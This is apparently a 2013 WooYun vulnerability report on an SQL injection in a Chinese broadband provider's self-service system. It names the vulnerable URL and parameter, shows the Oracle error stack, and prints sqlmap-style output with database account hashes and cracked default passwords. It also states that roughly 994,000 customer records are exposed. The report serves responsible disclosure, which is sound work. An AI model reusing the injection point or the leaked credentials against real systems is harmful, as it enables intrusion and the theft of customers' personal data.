当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038247

漏洞标题:北京宽带通某系统注射漏洞百万用户信息泄露

相关厂商:北京宽带通

漏洞作者: 想要减肥的胖纸

提交时间:2013-09-26 13:23

修复时间:2013-11-10 13:24

公开时间:2013-11-10 13:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-26: 细节已通知厂商并且等待厂商处理中
2013-09-30: 厂商已经确认,细节仅向厂商公开
2013-10-10: 细节向核心白帽子及相关领域专家公开
2013-10-20: 细节向普通白帽子公开
2013-10-30: 细节向实习白帽子公开
2013-11-10: 细节向公众公开

简要描述:

百万的用户数据。

详细说明:

需要登录注入。
http://sqsvc.btte.net/self-service/udr.do?method=QueryForList
post:startyear=2011&startmonth=02
俺们家就是用的宽带通,2年50Mb超便宜。。。。

org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [ select b.* from ( select a.*,rownum row_id from ( select to_char(u.STARTTIME,'yyyy-mm-dd hh24:mi:ss') STARTTIME, to_char(u.STOPTIME,'yyyy-mm-dd hh24:mi:ss') STOPTIME, GWIP, SESSIONID, ID, USERNAME, SCHEMADETAILID, PRODUCTID, CUSTID, CALLINGID, CALLEDID, FRAMEDIPADDR, NASIDENTIFIER, NASPORTTYPE, NASPORTID, NASPORT, DURATION, DOWNOCTETS, UPOCTETS, DISCONNECTCAUSE, STREAMUSAGE, CHARGEFLAG, INSERTTIME,DURATIONUSAGE from bssudr u where u.custid=159192580 AND  to_char(STARTTIME,'yyyy-mm') = '2002-01'' ORDER BY ID asc ) a  ) b where row_id>0 and row_id<=10]; nested exception is java.sql.SQLException: ORA-01756: quoted string not properly terminated
org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:89)
org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.translate(SQLErrorCodeSQLExceptionTranslator.java:258)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:294)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:348)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:352)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:356)
org.springframework.jdbc.core.JdbcTemplate.queryForList(JdbcTemplate.java:387)
com.dfrk.udr.udrImpl.getList(udrImpl.java:81)
sun.reflect.GeneratedMethodAccessor55.invoke(Unknown Source)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:585)
org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:287)
org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:181)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:148)
org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:96)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:170)
org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:176)
$Proxy3.getList(Unknown Source)
com.dfrk.udr.udrAction.QueryForList(udrAction.java:98)
sun.reflect.GeneratedMethodAccessor54.invoke(Unknown Source)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:585)
org.apache.struts.actions.DispatchAction.dispatchMethod(DispatchAction.java:274)
org.apache.struts.actions.DispatchAction.execute(DispatchAction.java:194)
org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:419)
org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:224)
org.apache.struts.action.ActionServlet.process(ActionServlet.java:1194)
org.apache.struts.action.ActionServlet.doPost(ActionServlet.java:432)
javax.servlet.http.HttpServlet.service(HttpServlet.java:710)
javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
com.dfrk.filter.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:52)


提交个单引号就报错了。。。。

漏洞证明:

[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] BILL [1]:
password hash: CC249ABB49423C1E
[*] BOSS [1]:
password hash: A472100D4E2AEFE8
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: 9CF003410A739C6E
clear-text password: SYS
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HATEST [1]:
password hash: 2428525244F46E78
clear-text password: HATEST
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] KEFU [1]:
password hash: 744813B3A9664A05
clear-text password: KEFU
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 97468D731528F016
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: invalid
[*] ORACLE_OCM [1]:
password hash: 6D17CF1EB1611F94
clear-text password: ORACLE_OCM
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SELFAAA [1]:
password hash: AC6792E5D2B3639D
clear-text password: 123456
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 5638228DAF52805F
clear-text password: MANAGER
[*] SYSMAN [1]:
password hash: 447B729161192C24
clear-text password: SYSMAN
[*] SYSTEM [1]:
password hash: D4DF7931AB130E37
clear-text password: MANAGER
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] VINCENT [1]:
password hash: CA4C68AFC00A6AF9
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL

好多的默认密码

back-end DBMS: Oracle
available databases [17]:
[*] BILL
[*] BOSS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

BILL数据库是一些上网记录查询的?

Database: BOSS
+--------------+---------+
| Table | Entries |
+--------------+---------+
| BSSCUSTOMERS | 993994 |
+--------------+---------+

百万数据
泄露信息包括身份证、住址、电话、姓名等。危害很大。

QQ20130926-1@2x.png


我相信利用oracle 神马的java存储过程 可以拿到服务器权限,但是万一数据库宕机,我就悲催了。

修复方案:

过滤。
服务器方面要金星加固,更改oracle默认密码

版权声明:转载请注明来源 想要减肥的胖纸@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-09-30 21:04

厂商回复:

最新状态:

暂无